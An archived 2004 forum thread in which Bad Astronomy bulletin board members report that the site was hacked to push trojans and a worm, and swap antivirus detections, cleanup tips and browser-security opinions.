PDA

View Full Version : BABB hacked: Virus insterted into all who viewed it.



Humphrey
2004-Nov-21, 09:12 PM
Please scan your harddrives. When coming up on the main BABB page Norton was screaming at me that i had many Javascritpt/java (not sure which) viruses trying to be installed on my system. And im using mozilla/netscape.

Be careful.

edit: IT seems that the BA has responded and removed the torjan virus information. Hopefully he gets it all.

xbck1
2004-Nov-21, 09:22 PM
No, he hasn't. I'm having to go through other routes to post without having to worry about that dern Trojan. Luckily Norton picked it up and deleted it right away, but I'm still leery of it.

Humphrey
2004-Nov-21, 11:06 PM
Virus is still here.

TrAI
2004-Nov-21, 11:42 PM
Yes, AVG was warning me about the Byteverify trojan here, also every page seems to include a scripting exploit for IE, and I got a download attempt for some dialer not that long ago. I would advice people not to use IE(or at least go to the windows update site to get patches) while surfing the BABB until the problem is resolved. I deactivated Java(to stop the byteverify downloads) and java scripting(to stop the annoying "bad URL" warning about the scripting exploit) in Opera...

frogesque
2004-Nov-22, 12:31 AM
AVG warned me also, I did a scan with Trend Housecall and picked up 1 infected file. (I have Java scripts disabled)

Welcome back BA and thanks for the prompt action and the info posted on the main site page. =D>

The Bad Astronomer
2004-Nov-22, 12:34 AM
It should be fixed. I posted on "About the BABB".

Gullible Jones
2004-Nov-22, 12:35 AM
Good. I should be safe anyway, but on the off chance that someone's logging our keystrokes...

Moose
2004-Nov-22, 12:43 AM
Yeah, looks clean to me. No alerts on the way in. Cool.

Gullible Jones
2004-Nov-22, 12:47 AM
=D> \:D/ =D> \:D/ =D> \:D/ =D>

http://www.planetsmilies.com/smilies/party/party02.gifhttp://www.planetsmilies.com/smilies/party/party29.gifhttp://www.planetsmilies.com/smilies/party/party17.gif

slinted
2004-Nov-22, 02:46 AM
I know the file download of "gdnUS990.exe" didn't go through on my machine, was this the one/only trojan file? Or were there more than one? I just wanted to make sure for myself and others that we could specifically make sure nothing was installed.

Colt
2004-Nov-22, 03:13 AM
For anyone interested and who might not have tried to acess the site, this is what it looked like: http://img49.exs.cx/img49/6774/ba_hacked.png Those links, according to Vermonter, lead to some Russian site with more viruses. - Colt

Humphrey
2004-Nov-22, 03:16 AM
I know the file download of "gdnUS990.exe" didn't go through on my machine, was this the one/only trojan file? Or were there more than one? I just wanted to make sure for myself and others that we could specifically make sure nothing was installed.That was not the only thing. It aloso loaded a trojan virus throught Java. I would still scan your hardrive since you might have that on there if your AV did not catch it.

Sever
2004-Nov-22, 03:24 AM
Good thing I was using Firefox. :o
But even if I did get a virus I had to reformat my HD...again...
But hopefully I should be able to play some HL2 tonight(and browse the BABB without fear).

ktesibios
2004-Nov-22, 03:29 AM
For anyone interested and who might not have tried to acess the site, this is what it looked like: http://img49.exs.cx/img49/6774/ba_hacked.png Those links, according to Vermonter, lead to some Russian site with more viruses. - Colt

The file that the hacked main page tried to trick the reader into downloading and running was identified by McAfee as the W32/Sdbot.worm.gen worm (McAfee's name; Symantec calls it w32.hllw.moega).

It's an ugly piece of work that besides doing the usual worm stuff (like acting as a backdoor, trying to propagate to other computers on the same subnet etc.) for some reason tries to steal CD keys for around a dozen popular games.

I also got the impression that that page was also trying to do a drive-by install of at least one porn dialer and possibly other spyware.

As far as up-to-date copies of McAfee Virus Scan and Spybot Search and Destroy can tell, I seem to have escaped acquiring any nasties. Anyone who was running Internet Exploder without good virus and spyware protection software might not have been so lucky.

Vandalism, physical or cyber, makes me really angry. I hope that the perpetrator winds up paying a suitable penalty.

Kesh
2004-Nov-22, 03:34 AM
This is one reason I love my Mac...

Still, it sucks that someone would resort to such shenanigans.

Yoshua
2004-Nov-22, 03:38 AM
For anyone interested and who might not have tried to acess the site, this is what it looked like: http://img49.exs.cx/img49/6774/ba_hacked.png Those links, according to Vermonter, lead to some Russian site with more viruses. - Colt

The file that the hacked main page tried to trick the reader into downloading and running was identified by McAfee as the W32/Sdbot.worm.gen worm (McAfee's name; Symantec calls it w32.hllw.moega).

It's an ugly piece of work that besides doing the usual worm stuff (like acting as a backdoor, trying to propagate to other computers on the same subnet etc.) for some reason tries to steal CD keys for around a dozen popular games.

I also got the impression that that page was also trying to do a drive-by install of at least one porn dialer and possibly other spyware.

As far as up-to-date copies of McAfee Virus Scan and Spybot Search and Destroy can tell, I seem to have escaped acquiring any nasties. Anyone who was running Internet Exploder without good virus and spyware protection software might not have been so lucky.

Vandalism, physical or cyber, makes me really angry. I hope that the perpetrator winds up paying a suitable penalty.

Unfortunatly, they probably won't. Might get someone in trouble with their ISP if the ISP is cooperative and sympathetic. About the best we're likely to get is having the offender's site blocked at BA's ISP.

Fed's won't get involved with anything that doesn't show like 6 figure damages. Even then, if the person who did this was overseas, there is little the FBI could do anyways.

I hate to be bleak about it, but there's a reason this kind of thing is so common and why we must all use firewall and anti-virus software (other than the fact that the hacks at M$ can't be bothered to secure Windows).

crateris
2004-Nov-22, 04:08 AM
Just out of curiosity, would that virus affect someone using a Mac (using IE)? I didn't click on the link as it was for Windows 98 (I think, anyway).

BTW, www.chemtrailcentral.com is having problems, also.

Maybe a conspiracy??

8-[

C.

Yoshua
2004-Nov-22, 04:37 AM
Just out of curiosity, would that virus affect someone using a Mac (using IE)? I didn't click on the link as it was for Windows 98 (I think, anyway).

BTW, www.chemtrailcentral.com is having problems, also.

Maybe a conspiracy??

8-[

C.

Not unless it executed code the mac could actually run that exploited some flaw in Mac OS security. If your running Mac OS X, that isn't bloody likely.

Most virii target windows, it's an easy target.

crateris
2004-Nov-22, 04:41 AM
Just out of curiosity, would that virus affect someone using a Mac (using IE)? I didn't click on the link as it was for Windows 98 (I think, anyway).

BTW, www.chemtrailcentral.com is having problems, also.

Maybe a conspiracy??

8-[

C.

Not unless it executed code the mac could actually run that exploited some flaw in Mac OS security. If your running Mac OS X, that isn't bloody likely.



Most virii target windows, it's an easy target. :lol:

Thanks for the info. I'm running OS 9. No self-respecting Windows hacker would dirty his hands on that!

Virii. I like that. Kinda like focii.

C.

Postmortem
2004-Nov-22, 04:56 AM
don't think your immune just becuase your running firefox, I am and I still got hit, of course my firewall [zonealarm] has been acting up and I had to shut it off to surf, but I figured this site would be safe

by the way anyone have any reccomendations for a better firewall then zonealarm? I have always had trouble with it blocking internet access after I leave my computer running for some time, and no I don't have the auto lock on it just locks out all service after a while if I'm not currently online, I have had this problem with ZA for a long time and with multiple versions, but have still been using it because it's better then spending all my time removing viruses and spyware

PhantomWolf
2004-Nov-22, 05:52 AM
Most virii target windows, it's an easy target.

It's not so much an easy target as a fat one because if you want to do damage to a lot of systems you go after the one that has 90% of the market, not the one that has 1%. If Linux had more users, then it'd have more hackers.

As to being in danger, nah, I'm running 98SE, IE 6.0, Norton AV for Win 95 (updated as of the 20th Nov 2004), Adaware 6.0 (updated as of today), and ZoneAlarm 5.5. Norton picked up and prevent the Trojan attacks and I'm still yet to have anything serious happen to my computer. The only virus I have ever had I got from work before I knew they had it.

tofu
2004-Nov-22, 12:31 PM
Good thing I was using Firefox.

I was just about to say that. Why do people stay with IE?? Firefox is free guys. Opera is free. Come on. Save IE for that 1/1000 site that doesn't work right with mozilla. Or better yet just avoid those sites because it's obvious the developers don't care.

If you spend any time on the interenet you are going to run into hacked sites like we had yesterday. Whatever you may think of IE (and you're probably wrong, it's not faster, it doesn't have more features) you'll be sorry when you hit a hacked site and get a virus.

frogesque
2004-Nov-22, 12:48 PM
Well, I downloaded Firefox some time ago and it just plain don't work. I either get errors and it shuts down or I get site not found when I know full well that the site(s) are OK.

Not impressed with it, does it uninstall OK?

Edit: CAN you uninstall it - there doesn't seem to be an option to do that?

Maksutov
2004-Nov-22, 12:57 PM
Well, I downloaded Firefox some time ago and it just plain don't work. I either get errors and it shuts down or I get site not found when I know full well that the site(s) are OK.

Not impressed with it, does it uninstall OK?

Edit: CAN you uninstall it - there doesn't seem to be an option to do that?
Sorry to hear about your experience with Firefox. I've been using it since it was Firebird, and have had nothing but good experiences. Firefox is like a Benz, IE is like a Pinto.

Perhaps your installation didn't go that well. Maybe an uninstall and reinstall would be in order. What's your OS? Did you terminate all running processes during the install? Did you do a scan prior to install? Did you have administrative privileges to install? Etc...

iFire
2004-Nov-22, 01:21 PM
I love Symantec Anti-Virus. :D *hugs it*

Wally
2004-Nov-22, 01:54 PM
Uh oh!! Just received a handful of messages from Norton stating a trojan was detected and successfully quarantined. Looks like this SOB is back! :evil:

iFire
2004-Nov-22, 01:56 PM
Uh oh!! Just received a handful of messages from Norton stating a trojan was detected and successfully quarantined. Looks like this SOB is back! :evil:

Yea, I'm getting it too. Lets find who it is and kill 'em. :evil:

tofu
2004-Nov-22, 01:57 PM
It's not so much an easy target as a fat one because if you want to do damage to a lot of systems you go after the one that has 90% of the market, not the one that has 1%. If Linux had more users, then it'd have more hackers.

Well, Apache webserver has a larger share of the market than Microsoft IIS, yet IIS has more vulnerabilitites.

The common thread seems to be microsoft, not market share.

tofu
2004-Nov-22, 02:00 PM
I'm not sure if the BA will read this thread, but here is a recent bugtraq entry on PHPBB2:

http://www.securityfocus.com/archive/1/381555/2004-11-19/2004-11-25/0

Are you running "Cash Mod" or is your ISP running it? That might be how the hackers got in.

Ut
2004-Nov-22, 02:52 PM
It's not so much an easy target as a fat one because if you want to do damage to a lot of systems you go after the one that has 90% of the market, not the one that has 1%. If Linux had more users, then it'd have more hackers.

Well, Apache webserver has a larger share of the market than Microsoft IIS, yet IIS has more vulnerabilitites.

The common thread seems to be microsoft, not market share.

Yes, MS products are more vunerable. That doesn't defeat the argument that if Linux had a 90% market share, it'd be bombarded with viruses, too, though.

Besides, the only people using linux are those who know how to clean or avoid the bugs, anyway.


Firefox keeps whining about a missing plugin. *sigh* Ahh well. Time for another scan.

Tranquility
2004-Nov-22, 03:02 PM
Guys, the board is still infected. Be careful. Norton is screaming bloody murder.

Humphrey
2004-Nov-22, 03:09 PM
Turn off Java.

frogesque
2004-Nov-22, 03:11 PM
Yep, I have I seem to have been re-infected despite all precautions unless Panda has picked up something different. It cleared the problem but then IE crashed so I can't get details. 2nd run is progressing OK, 51k files checked and all clear so far.

BTW Humphrey, I have Java off permanantly to aid in blocking ads. I've only had 2 infected files but still checking.

JFM
2004-Nov-22, 03:41 PM
"D:\DOCUMENTS AND SETTINGS\JFM\APPLICATION DATA\SUN\JAVA\DEPLOYMENT\CACHE\JAVAPI\V1.0\JAR\CLA SSLOAD.JAR-568F1B37-3F5D2808.ZIP

The Trojan horse TR/ClassLder.c.Java"

Several varinants of this have just tried to access my comp' I have tried all my browsers, I mainly use Mozilla 1.7.3. But it also tried with, IE, Firefox, Opera and Avant.

So the script kiddies are realising, these days just using IE exploits ain't good enough.

Tero
2004-Nov-22, 04:11 PM
I use Safari on Mac OS X and I keep getting these files named 2DimensionOfExploitsEnc-1.php, 2DimensionOfExploitsEnc-2.php, and so on. There's still something wrong.

Reacher
2004-Nov-22, 04:14 PM
eTrust Antivirus is complaining at me about several (maybe 6 or so) files in my Temporary internet files that are apparently trojans, for example the HTML.MHTMLRedir.exploit trojan. I know what a trojan is, and that's about the extent of my knowledge. Is this the virus/viruses in question, or did I pick this up somewhere else?

Also, how do I turn off Java?

And yes, I was using IE... I shall be making FireFox my primary browser.

As soon as I work out how.

DreadCthulhu
2004-Nov-22, 04:21 PM
Most virii target windows, it's an easy target.

It's not so much an easy target as a fat one because if you want to do damage to a lot of systems you go after the one that has 90% of the market, not the one that has 1%. If Linux had more users, then it'd have more hackers.


I disagree. Linux is inherently more secure. Just compare Apache webservers (open source, mostly running on Linux) versus Microsoft IIS hacks- Apache has about double the market share of Microsoft IIS, yet IIS is hacked much more often. While Linux would certainly have more hackers than it does now if it had 50% of the market, the exploit level still wouldn't match Microsofts, due to the better security model.

Also note, almost every home Windows XP box is running in Admin mode, while almost every Linux distro strongly warns against running in root, and has you use a limited account.

And besides, its hard enough to install programs in Linux on purpose; having it done by a little script like that - :lol: :lol:

frogesque
2004-Nov-22, 04:22 PM
Reacher, I'm on Win98 so this may not be exactly right for you.

Path for Win98

Start > Settings > Control Panel > Java Plugins > Browser . Uncheck for all browsers set as default Java run time.

Also a good idea to go to the Cache tab and clear.

Roving Philosopher
2004-Nov-22, 04:58 PM
[snip]

by the way anyone have any reccomendations for a better firewall then zonealarm? I have always had trouble with it blocking internet access after I leave my computer running for some time, and no I don't have the auto lock on it just locks out all service after a while if I'm not currently online, I have had this problem with ZA for a long time and with multiple versions, but have still been using it because it's better then spending all my time removing viruses and spyware

I use TrendMicro PC-cillin Internet Security. I've had no viruses, no spyware (it caught and quarantined the bug here), and for the most part, I'm not even aware it's there. I'm not sure how easy it is to make detailed configuration changes (like setting up specific firewall rules), since I've never actually tried. I've been running it with default settings, and I've had no complaints.

zebo-the-fat
2004-Nov-22, 05:07 PM
I have only been using Firefox for a day or two (looks good so far), but now when I access the BB I get a box saying I need to install extra plugins to view all the media on the page. Since I can see everything (I think) I assume that it's just the work of our evil trojan. Has anyone else had this? :(

mid
2004-Nov-22, 05:23 PM
You can see everything except that little dead square above and to the left of the "Bad Astronomy Bulletin Board Forum Index ->" link. Which contains both the infectious Java (being Java, wouldn't that make Macs vulnerable, too?) and the requirement for the plugin. I'm now trying to work out how to make Firefox stop asking me to install it...

Yoshua
2004-Nov-22, 05:45 PM
You can see everything except that little dead square above and to the left of the "Bad Astronomy Bulletin Board Forum Index ->" link. Which contains both the infectious Java (being Java, wouldn't that make Macs vulnerable, too?) and the requirement for the plugin. I'm now trying to work out how to make Firefox stop asking me to install it...

No, java is just being used as the delivery mechanism. The exploit is x86 specific, Mac's use an entirely differant machine architecure. It's the same reason you can't run a PC game on a Mac (barring the use of emulation software).

Don't buy in to the M$ FUD. They'd like you to think that their system is only more vulnerable because it is used on more desktops. That is part of it, but the bigger reason is simply that Windows is a far easier target.

Windows is a monolithic operating system. Everything is wrapped up together. When one piece is comprimised, the whole thing goes. Linux is modular, if one piece is comprimised, the rest of the system can still function.

Windows has very primitive access controls. And by default they're set to allow users access to everything. Linux on the other hand provides very strict access to parts of the system not just by user but by application as well.

Even if someone managed to comprimise a linux user, all they would likely gain access to is that user's home directory. They would have no ability to write in any of the system areas which makes writing a malicious virus to infect linux a very difficult task (I'd say impossible, but I can't with certainty).

Attacks on linux users would be an annoyance at worst. You'd just change to single user mode, login as root, un-do whatever changes the person made to your directory (basiclly, you copy some files from a backup). But someone even getting that far is a real trial to say the least. The only way someone could hurt a linux user would be to gain root access, and that can be made restricted to only users with physical access to the machine, or slightly broader to include people only on your own network.

The windows method. If your lucky, it's something your virus scanner picks up on and removes. If it's something your virus scanner doesn't recognize, you could easily be looking at having to format your hard drive and re-install, losing a lot of saved data.

Still, I wind up using windows because I like gaming. I am just sure to not keep any critical data on my windows box.

latimer
2004-Nov-22, 05:47 PM
Hello,

I, too, am getting my virus warning on every page; so the threat must be common to all pages being loaded (perhaps one of the graphics?)

McAfee calls it Explolit-MhtRedir.gen; and it comes down into one of the temporary internet files.

Hope you find them, BA.

Jonathan
-It doesn't matter yadda yadda-

electromagneticpulse
2004-Nov-22, 07:01 PM
I still use evil ol' IE, i know all the tricks with it. Hate the damn search bars that get installed sometimes... saying that i'm fighting a war with an adsrve program which hyperlinks words. I'm not sure how i got it as i never downloaded anything #-o I still cant get javascripts to run :evil:

Edit: just got them working again 8) (didn't type that one)

Crashtest
2004-Nov-22, 07:15 PM
Just thought I would run my paranoia by the experts on the page here (not experts in paranoia, but in the virus attack 8-[ ) I just started using Firefox literally last night and I, even after reading all about the virus, clicked on the plugin note #-o . I don't think I downloaded anything since it said no appropriate plugins were found, but I wanted to make sure I am in the clear with all of this. I have my Norton running a full scan just to be sure and I think I cleared out my Java cache.... so far no hidden friends have been found, but I just want to make sure I am not about have my computer melt on me. Thank you all in advance for any info you might have. :D

CTM VT 2K
2004-Nov-22, 07:36 PM
... so far no hidden friends have been found, but I just want to make sure I am not about have my computer melt on me. Thank you all in advance for any info you might have. :D

Well, I wouldn't expect your computer to melt on you (that would require a fair amount of heat - most likely secondary to some variety of combustion not directly related to your brush-with-virii). :lol:

So long as you run an up-to-date Anti-Virus, and use some sort of Spyware/Adware detector remover, you should be fine. I use Norton, Spybot and Ad-Aware. Granted, I have them all configured for Ultimate Paranoid (My computer has been known to corner people and torture them until they admit to being a really advanced form of spyware). I also use Opera, with similarly configured settings. Not tried Firefox - I moved to Opera from IE before I heard about Firefox. Not worth my time to convert to Firefox... maybe on my next computer. :-k

Wally
2004-Nov-22, 07:52 PM
Has anyone PM'd Phil to let him know we've been re-infected?

kucharek
2004-Nov-22, 07:55 PM
Has anyone PM'd Phil to let him know we've been re-infected?
I did and he already fixed it (http://www.badastronomy.com/phpBB/viewtopic.php?p=369161#369161).
Or do we have a third attack? :o

Tero
2004-Nov-22, 08:02 PM
I use Safari on Mac OS X and I keep getting these files named 2DimensionOfExploitsEnc-1.php, 2DimensionOfExploitsEnc-2.php, and so on. There's still something wrong.

And now it's been fixed, at least I'm not getting those files anymore.

mid
2004-Nov-23, 10:47 AM
All clean here, too.

Wally
2004-Nov-23, 01:34 PM
I received the virus warning again this morning when I accessed the main website, but have not received it since coming to the board. I posted this info on the BAD, BAD forum listed in Kucharek's post above as well.

Glom
2004-Nov-23, 03:43 PM
Same here. There was a warning posted recently at AH reporting problems for a third time, so I bypassed the main site and went directly to the board without incident. I think it's just the main site that has problems at the moment.

This is going to be a real setback for BA's campaign to convince us that there's a website attached to this bulletin board. :)

electromagneticpulse
2004-Nov-23, 04:11 PM
This is going to be a real setback for BA's campaign to convince us that there's a website attached to this bulletin board. :)
Web... Site? #-o

Moose
2004-Nov-23, 05:18 PM
Okay, I had a look. Main page and a few random (static) sub pages all seem to be clear for now. I've detected no hostile page elements.